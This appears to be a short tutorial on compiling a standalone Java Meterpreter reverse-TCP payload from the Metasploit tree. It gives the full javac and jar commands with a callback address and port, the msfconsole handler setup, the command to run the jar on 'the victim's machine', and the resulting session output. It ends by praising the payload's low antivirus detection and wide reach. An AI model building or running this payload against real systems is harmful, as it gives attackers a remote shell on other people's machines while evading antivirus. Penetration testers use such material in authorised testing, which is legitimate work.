The documentation out there on the web is somewhat out-of-date when it comes to compiling and executing a standalone Java Meterpreter payload, and as it's yet to become part of the core features of the Metasploit framework , I expect these steps to change again in the future. In the past you could use loader.jar to run the payload, though this is no longer included in the tree - instead, compile your own, using Payload.java (included in the tree):
Create the Meterpreter JAR:
cd ./external/source/javapayload/src/ javac -source 1.4 -target 1.4 metasploit/Payload.java echo -e "LHOST=10.0.0.1\nLPORT=82" > metasploit.dat jar cfe payload.jar metasploit.Payload metasploit/Payload.class metasploit.dat
Now to listen for the exploit in the Metasploit console:
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.1 LHOST => 10.0.0.1 msf exploit(handler) > set LPORT 82 LPORT => 82 msf exploit(handler) > exploit [*] Started reverse handler on 10.0.0.1:82 [*] Starting the payload handler...
Launch the payload on the victim's machine:
java -jar payload.jar
Wait for the results:
[*] Sending stage (28541 bytes) to 192.168.0.1 [*] Meterpreter session 1 opened (10.0.0.1:82 -> 192.168.0.1:54562) at 2012-03-21 09:53:20 +0000
- AV detection is very low
- Most boxes have Java installed
- It works
- Limited post exploitation modules can be run
- Not as functional as a shell-code meterpreter session.